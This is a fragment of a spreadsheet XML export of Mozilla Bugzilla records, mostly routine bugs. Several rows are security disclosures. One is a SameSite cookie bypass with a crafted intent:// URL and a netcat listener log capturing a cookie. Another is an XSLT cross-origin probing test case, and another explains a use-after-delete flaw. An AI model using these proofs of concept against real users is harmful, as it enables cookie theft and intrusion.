          <t>P1</t>
        </is>
      </c>
      <c r="R6177" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6177" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T6177" t="n">
        <v>1</v>
      </c>
      <c r="U6177" t="n">
        <v>0</v>
      </c>
      <c r="V6177" t="n">
        <v>20</v>
      </c>
      <c r="W6177" t="inlineStr">
        <is>
          <t>Crash after clicking on "Continue&gt;" button on ebay's "Review Your Purchase"
after selecting a payment method. It crashes when status bar displays "read
secureinclude.ebaystatic.com".
But it only crashes if JavaScript is switched *off* (javascript.enabled = false)
or is prohibited for the page via policies.
It crashes with Firefox Trunk Win 20051016, Seamonkey Trunk Win 20051013 and
Seamonkey Trunk Linux 20051016.
Talkback ID's for this are:
Seamonkey Win:
TB10733074Y, TB10733077G, TB10733304Z, TB10733396Q, TB10734827Y, TB10735665G
Firefox Win:
TB10762793X, TB10763001M</t>
        </is>
      </c>
      <c r="X6177" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6178">
      <c r="A6178" t="n">
        <v>1584936</v>
      </c>
      <c r="B6178" t="inlineStr">
        <is>
          <t>2019-09-30 04:27:04 -0700</t>
        </is>
      </c>
      <c r="C6178" t="inlineStr">
        <is>
          <t>Ingest available measurement units</t>
        </is>
      </c>
      <c r="D6178" t="inlineStr">
        <is>
          <t>2019-10-22 03:54:32 -0700</t>
        </is>
      </c>
      <c r="E6178" t="n">
        <v>1</v>
      </c>
      <c r="F6178" t="n">
        <v>1</v>
      </c>
      <c r="G6178" t="n">
        <v>7</v>
      </c>
      <c r="H6178" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6178" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6178" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K6178" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6178" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6178" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6178" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6178" t="inlineStr"/>
      <c r="Q6178" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6178" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6178" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6178" t="n">
        <v>1</v>
      </c>
      <c r="U6178" t="n">
        <v>0</v>
      </c>
      <c r="V6178" t="n">
        <v>2</v>
      </c>
      <c r="W6178" t="inlineStr">
        <is>
          <t>Some of the perf tests already provide measurement units, under the key `unit`.
Perfherder should ingest new perf signatures with the measurement unit, if available.
Also, Perfherder should update perf signatures' measurement unit, if that changes or becomes available at a later point.</t>
        </is>
      </c>
      <c r="X6178" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6179">
      <c r="A6179" t="n">
        <v>1791201</v>
      </c>
      <c r="B6179" t="inlineStr">
        <is>
          <t>2022-09-16 10:49:03 -0700</t>
        </is>
      </c>
      <c r="C6179" t="inlineStr">
        <is>
          <t>SameSite=Strict cookie bypass on Android via fallback URLs in intent:// scheme</t>
        </is>
      </c>
      <c r="D6179" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:34 -0700</t>
        </is>
      </c>
      <c r="E6179" t="n">
        <v>1</v>
      </c>
      <c r="F6179" t="n">
        <v>1</v>
      </c>
      <c r="G6179" t="n">
        <v>2</v>
      </c>
      <c r="H6179" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6179" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J6179" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6179" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6179" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6179" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6179" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [geckoview:m107][adv-main107+]</t>
        </is>
      </c>
      <c r="Q6179" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6179" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6179" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6179" t="n">
        <v>1</v>
      </c>
      <c r="U6179" t="n">
        <v>0</v>
      </c>
      <c r="V6179" t="n">
        <v>11</v>
      </c>
      <c r="W6179" t="inlineStr">
        <is>
          <t>Created attachment 9295084
cookie.php
SameSite=Strict cookies can be sent cross-site (without user interaction) via the intent URLs. Consider the following URL:
````
intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end
```` 
On Android, the S.browser_fallback_url parameter specifies the URL to load when the browser fails to verify the intent. As the intent above is invalid due to the invalid package name, then Firefox browser will not open another app but instead open the URL http://192.168.1.70:8000/cookie.
When opening the fallback_url parameter, it doesn't take into account the passing of SameSite=Strict cookie, as such, an attacker can just redirect a user to the URL intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end and the cookies will get passed on.
STR:
1. Download attached files.
2. Host cookie.php on Site A, intent-redirect.php on Site B. Remember to change the URL in intent-redirect.php to Site B!
3. Visit cookie.php on Site A to retrieve SameSite cookies
4. Open a listener on Site A, then visit intent-redirect.php on Site B 
5. The SameSite cookie gets sent to cross-site from Site B to Site A.
```` 
└─$ nc -nvlp 8000
listening on [any] 8000 ...
connect to [192.168.1.70] from (UNKNOWN) [192.168.1.127] 43784
GET /cookie HTTP/1.1
Host: 192.168.1.70:8000
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:104.0) Gecko/104.0 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: a=b
Upgrade-Insecure-Requests: 1
````</t>
        </is>
      </c>
      <c r="X6179" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6180">
      <c r="A6180" t="n">
        <v>705651</v>
      </c>
      <c r="B6180" t="inlineStr">
        <is>
          <t>2011-11-28 06:26:31 -0800</t>
        </is>
      </c>
      <c r="C6180" t="inlineStr">
        <is>
          <t>Frame scripts that access untrusted objects are exploitable</t>
        </is>
      </c>
      <c r="D6180" t="inlineStr">
        <is>
          <t>2012-08-15 08:31:12 -0700</t>
        </is>
      </c>
      <c r="E6180" t="n">
        <v>1</v>
      </c>
      <c r="F6180" t="n">
        <v>1</v>
      </c>
      <c r="G6180" t="n">
        <v>3</v>
      </c>
      <c r="H6180" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6180" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6180" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6180" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6180" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6180" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6180" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6180" t="inlineStr">
        <is>
          <t>[sg:critical][qa!][secr:dveditz]</t>
        </is>
      </c>
      <c r="Q6180" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6180" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6180" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T6180" t="n">
        <v>1</v>
      </c>
      <c r="U6180" t="n">
        <v>0</v>
      </c>
      <c r="V6180" t="n">
        <v>21</v>
      </c>
      <c r="W6180" t="inlineStr">
        <is>
          <t>Frame scripts run on the special JS context for which we call SetSecurityManagerForJSContext with flags=0, thus if a frame script calls into an untrusted function, XPConnect does not do proper security checks.</t>
        </is>
      </c>
      <c r="X6180" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6181">
      <c r="A6181" t="n">
        <v>271209</v>
      </c>
      <c r="B6181" t="inlineStr">
        <is>
          <t>2004-11-22 05:00:54 -0800</t>
        </is>
      </c>
      <c r="C6181" t="inlineStr">
        <is>
          <t>xsl:include and xsl:import allow at least checking for existance of documents on arbitrary servers</t>
        </is>
      </c>
      <c r="D6181" t="inlineStr">
        <is>
          <t>2006-03-12 18:10:32 -0800</t>
        </is>
      </c>
      <c r="E6181" t="n">
        <v>1</v>
      </c>
      <c r="F6181" t="n">
        <v>1</v>
      </c>
      <c r="G6181" t="n">
        <v>3</v>
      </c>
      <c r="H6181" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6181" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6181" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K6181" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6181" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6181" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6181" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6181" t="inlineStr">
        <is>
          <t>[sg:fix] fixed on trunk</t>
        </is>
      </c>
      <c r="Q6181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6181" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6181" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6181" t="n">
        <v>1</v>
      </c>
      <c r="U6181" t="n">
        <v>0</v>
      </c>
      <c r="V6181" t="n">
        <v>33</v>
      </c>
      <c r="W6181" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
xsl:include and xsl:import import stylesheets from arbitrary domains (and
probably from local fs).
this allows at least checking for documents. it may be possible to read xml
files, not sure.
testcase - open xsl1.html
--------------xsl1.html--------
&lt;html&gt;
	&lt;script&gt;
		function vv() 
		{
			v1=a.document.firstChild;
			alert(v1.textContent);
		}
		a=window.open("/xslinc.xml");
		setTimeout("vv()",8000);
	&lt;/script&gt;
	&lt;h1&gt;Copyright Georgi Guninski. Cannot be used in vulnerability databases
	&lt;/h1&gt;	
&lt;/html&gt;
-------------------------------
-----xslinc.xml----------------
&lt;?xml version="1.0"?&gt;
&lt;?xml-stylesheet type="text/xsl" href="#"?&gt;
&lt;!-- Copyright Georgi Guninski. Cannot be used in vulnerability databases --&gt;
&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"&gt;
	&lt;xsl:include href="http://www.mozilla.org/" /&gt;
	&lt;xsl:include href="http://www.mozilla.org/404-404" /&gt;
 &lt;xsl:template match="/"&gt;
 &lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;
-------------------------------
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X6181" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6182">
      <c r="A6182" t="n">
        <v>1400395</v>
      </c>
      <c r="B6182" t="inlineStr">
        <is>
          <t>2017-09-15 13:49:30 -0700</t>
        </is>
      </c>
      <c r="C6182" t="inlineStr">
        <is>
          <t>browser_creditCard_doorhanger.js is going to permafail when Gecko 57 merges to Beta</t>
        </is>
      </c>
      <c r="D6182" t="inlineStr">
        <is>
          <t>2017-09-18 06:00:13 -0700</t>
        </is>
      </c>
      <c r="E6182" t="n">
        <v>1</v>
      </c>
      <c r="F6182" t="n">
        <v>1</v>
      </c>
      <c r="G6182" t="n">
        <v>3</v>
      </c>
      <c r="H6182" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6182" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6182" t="inlineStr">
        <is>
          <t>Form Manager</t>
        </is>
      </c>
      <c r="K6182" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6182" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6182" t="inlineStr">
        <is>
          <t>[form autofill]</t>
        </is>
      </c>
      <c r="Q6182" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6182" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6182" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T6182" t="n">
        <v>1</v>
      </c>
      <c r="U6182" t="n">
        <v>0</v>
      </c>
      <c r="V6182" t="n">
        <v>6</v>
      </c>
      <c r="W6182" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Blocking any m-c -&gt; m-b merges at the moment.
https://treeherder.mozilla.org/logviewer.html#?job_id=131360944&amp;repo=try
TEST-UNEXPECTED-TIMEOUT | browser/extensions/formautofill/test/browser/browser_creditCard_doorhanger.js | application timed out after 330 seconds with no output</t>
        </is>
      </c>
      <c r="X6182" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6183">
      <c r="A6183" t="n">
        <v>16016</v>
      </c>
      <c r="B6183" t="inlineStr">
        <is>
          <t>1999-10-10 19:41:53 -0700</t>
        </is>
      </c>
      <c r="C6183" t="inlineStr">
        <is>
          <t>Votes field gives wrong value in bug lists.</t>
        </is>
      </c>
      <c r="D6183" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E6183" t="n">
        <v>1</v>
      </c>
      <c r="F6183" t="n">
        <v>1</v>
      </c>
      <c r="G6183" t="n">
        <v>4</v>
      </c>
      <c r="H6183" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6183" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6183" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6183" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6183" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6183" t="inlineStr"/>
      <c r="Q6183" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6183" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6183" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T6183" t="n">
        <v>1</v>
      </c>
      <c r="U6183" t="n">
        <v>0</v>
      </c>
      <c r="V6183" t="n">
        <v>6</v>
      </c>
      <c r="W6183" t="inlineStr">
        <is>
          <t>It seems that the "Votes" column in bug lists is wrong, it is different from
what appears in the bug itself.
I have a query:
http://bugzilla.mozilla.org/buglist.cgi?email1=&amp;emailtype1=substring&amp;emailassign
ed_to1=1&amp;emailreporter1=1&amp;emailqa_contact1=1&amp;emailcc1=1&amp;email2=&amp;emailtype2=subst
ring&amp;emailreporter2=1&amp;changedin=&amp;votes=3&amp;chfieldfrom=&amp;chfieldto=Now&amp;chfieldvalue
=&amp;short_desc=&amp;short_desc_type=substring&amp;long_desc=&amp;long_desc_type=substring&amp;bug_
file_loc=&amp;bug_file_loc_type=substring&amp;status_whiteboard=&amp;status_whiteboard_type=
substring&amp;newqueryname=&amp;form_name=query&amp;order=votesum%2C%20bugs.priority%2C%20bu
gs.bug_severity
to return the most popular bugs.  It seems that it returns the number of votes
multiplied by the number of people in the CC field!
See in particular bug #991 : 22 votes x 4 CC people = 88 and bug #3013 : 17
votes x 5 CC people = 85.
This is bad because it is affecting which bugs appear the most important.</t>
        </is>
      </c>
      <c r="X6183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6184">
      <c r="A6184" t="n">
        <v>1176340</v>
      </c>
      <c r="B6184" t="inlineStr">
        <is>
          <t>2015-06-19 11:52:51 -0700</t>
        </is>
      </c>
      <c r="C6184" t="inlineStr">
        <is>
          <t>DesktopDisplayDevice::operator= uses members after delete on self-assignment</t>
        </is>
      </c>
      <c r="D6184" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:34 -0700</t>
        </is>
      </c>
      <c r="E6184" t="n">
        <v>1</v>
      </c>
      <c r="F6184" t="n">
        <v>1</v>
      </c>
      <c r="G6184" t="n">
        <v>3</v>
      </c>
      <c r="H6184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6184" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K6184" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L6184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6184" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6184" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6184" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6184" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T6184" t="n">
        <v>1</v>
      </c>
      <c r="U6184" t="n">
        <v>0</v>
      </c>
      <c r="V6184" t="n">
        <v>9</v>
      </c>
      <c r="W6184" t="inlineStr">
        <is>
          <t>On self-assignment, DesktopDisplayDevice::operator= (38.0.1\media\webrtc\trunk\webrtc\modules\desktop_capture\desktop_device_info.cc) deletes its deviceNameUTF8_ and deviceUniqueIdUTF8_ pointers, then uses the deleted pointers to create new objects:
78: DesktopDisplayDevice&amp; DesktopDisplayDevice::operator= (DesktopDisplayDevice&amp; other) {
79:   screenId_ = other.getScreenId();
80:   setUniqueIdName(other.getUniqueIdName());
81:   setDeviceName(other.getDeviceName());
82:
83:   return *this;
84: }
70: const char *DesktopDisplayDevice::getDeviceName() {
71:   return deviceNameUTF8_;
72: }
74: const char *DesktopDisplayDevice::getUniqueIdName() {
75:   return deviceUniqueIdUTF8_;
76: }
58: void DesktopDisplayDevice::setDeviceName(const char *deviceNameUTF8) {
59:   SetStringMember(&amp;deviceNameUTF8_, deviceNameUTF8);
60: }
61:
62: void DesktopDisplayDevice::setUniqueIdName(const char *deviceUniqueIdUTF8) {
63:   SetStringMember(&amp;deviceUniqueIdUTF8_, deviceUniqueIdUTF8);
64: }
16: static inline void SetStringMember(char **member, const char *value) {
17:   if (!value) {
18:     return;
19:   }
20: 
21:   if (*member) {
22:     delete [] *member;
23:     *member = NULL;
24:   }
25: 
26:   size_t  nBufLen = strlen(value) + 1;
27:   char *buffer = new char[nBufLen];
28:   memcpy(buffer, value, nBufLen - 1);
29:   buffer[nBufLen - 1] = '\0';
30:   *member = buffer;
31: }
Lines 80/81 resolve to the calls SetStringMember (&amp;deviceUniqueIdUTF8_, deviceUniqueIdUTF8_) / SetStringMember (&amp;deviceNameUTF8_, deviceNameUTF8_). Line 21 then deletes the member pointers and nulls them out, but the argument value holds a temporary copy of those pointers, which lines 26 et seq use to build new objects and assign them to the member variables.
This bug could leak sensitive information and/or crash, but it seems that it could not overwrite unowned memory.</t>
        </is>
      </c>
      <c r="X6184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6185">
      <c r="A6185" t="n">
        <v>913805</v>
      </c>
      <c r="B6185" t="inlineStr">
        <is>
          <t>2013-09-07 06:04:15 -0700</t>
        </is>
      </c>
      <c r="C6185" t="inlineStr">
        <is>
          <t>Crash in [@ skia::`anonymous namespace''::ConvolveHorizontally&lt;int&gt;(unsigned char const*, skia::ConvolutionFilter1D const&amp;, unsigned char*) ]</t>
        </is>
      </c>
      <c r="D6185" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:19 -0700</t>
        </is>
      </c>
      <c r="E6185" t="n">
        <v>1</v>
      </c>
      <c r="F6185" t="n">
        <v>1</v>
      </c>
      <c r="G6185" t="n">
        <v>3</v>
      </c>
      <c r="H6185" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6185" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6185" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K6185" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L6185" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6185" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6185" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6185" t="inlineStr">
        <is>
          <t>[adv-main31+][adv-esr24.7+]</t>
        </is>
      </c>
      <c r="Q6185" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6185" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6185" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T6185" t="n">
        <v>1</v>
      </c>
      <c r="U6185" t="n">
        <v>0</v>
      </c>
      <c r="V6185" t="n">
        <v>48</v>
      </c>
      <c r="W6185" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 (Beta/Release)
Build ID: 20130906030202
Steps to reproduce:
1. Disable hardware acceleration.
2. Restart Firefox.
3. Go to http://dl.dropboxusercontent.com/u/95157096/85f61cf7/tgdvp4vc.jpg
4. Open a new tab.
Actual results:
Browser crash.
See http://s449.photobucket.com/user/movh/media/3pq52uw_zps09d07c82.mp4.html
Crash Report: bp-da1fdfd7-0c61-4dfb-9aa8-ab2f32130907</t>
        </is>
      </c>
      <c r="X6185" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6186">
      <c r="A6186" t="n">
        <v>377929</v>
      </c>
      <c r="B6186" t="inlineStr">
        <is>
          <t>2007-04-18 12:01:29 -0700</t>
        </is>
      </c>
      <c r="C6186" t="inlineStr">
        <is>
          <t>mozilla2 buildbot master setup</t>
        </is>
      </c>
      <c r="D6186" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6186" t="n">
        <v>1</v>
      </c>
      <c r="F6186" t="n">
        <v>1</v>
      </c>
      <c r="G6186" t="n">
        <v>5</v>
      </c>
      <c r="H6186" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6186" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6186" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6186" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6186" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6186" t="inlineStr"/>
      <c r="Q6186" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6186" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6186" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6186" t="n">
        <v>1</v>
      </c>
      <c r="U6186" t="n">
        <v>0</v>
      </c>
      <c r="V6186" t="n">
        <v>57</v>
      </c>
      <c r="W6186" t="inlineStr">
        <is>
          <t>Setup a buildbot building from the Moz2 Hg repo.  In order of importance, we need:
1) Repeating build reporting to tinderbox server
2) Nightly builds pushed to FTP
3) Nightly updates</t>
        </is>
      </c>
      <c r="X6186" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6187">
      <c r="A6187" t="n">
        <v>387705</v>
      </c>
      <c r="B6187" t="inlineStr">
        <is>
          <t>2007-07-11 12:02:57 -0700</t>
        </is>
      </c>
      <c r="C6187" t="inlineStr">
        <is>
          <t>Single dependency loop detect not working.</t>
        </is>
      </c>
      <c r="D6187" t="inlineStr">
        <is>
          <t>2007-07-11 12:40:45 -0700</t>
        </is>
      </c>
      <c r="E6187" t="n">
        <v>1</v>
      </c>
      <c r="F6187" t="n">
        <v>1</v>
      </c>
      <c r="G6187" t="n">
        <v>4</v>
      </c>
      <c r="H6187" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6187" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6187" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6187" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L6187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6187" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6187" t="inlineStr"/>
      <c r="Q6187" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6187" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6187" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T6187" t="n">
        <v>1</v>
      </c>
      <c r="U6187" t="n">
        <v>0</v>
      </c>
      <c r="V6187" t="n">
        <v>6</v>
      </c>
      <c r="W6187" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Bugzilla head
There is no single dependency loop check anymore.
This is because the only place it was checked was removed by bug 385379. The lines that did the checking were:
-    # Gather the dependency list, and make sure there are no circular refs
-    my %deps = Bugzilla::Bug::ValidateDependencies(scalar($cgi-&gt;param('dependson')),
-                                                   scalar($cgi-&gt;param('blocked')),
-                                                   $id);
-
Right now there is still one callsite to ValidateDependencies, but it doesn't use the bug_id, so the single loop is not detected.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X6187" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6188">
      <c r="A6188" t="n">
        <v>530001</v>
      </c>
      <c r="B6188" t="inlineStr">
        <is>
          <t>2009-11-19 20:58:43 -0800</t>
        </is>
      </c>
      <c r="C6188" t="inlineStr">
        <is>
          <t>copy for getting started - any user other than 3.6 without the extension</t>
        </is>
      </c>
      <c r="D6188" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E6188" t="n">
        <v>1</v>
      </c>
      <c r="F6188" t="n">
        <v>1</v>
      </c>
      <c r="G6188" t="n">
        <v>6</v>
      </c>
      <c r="H6188" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6188" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J6188" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K6188" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6188" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6188" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6188" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6188" t="inlineStr"/>
      <c r="Q6188" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6188" t="inlineStr">
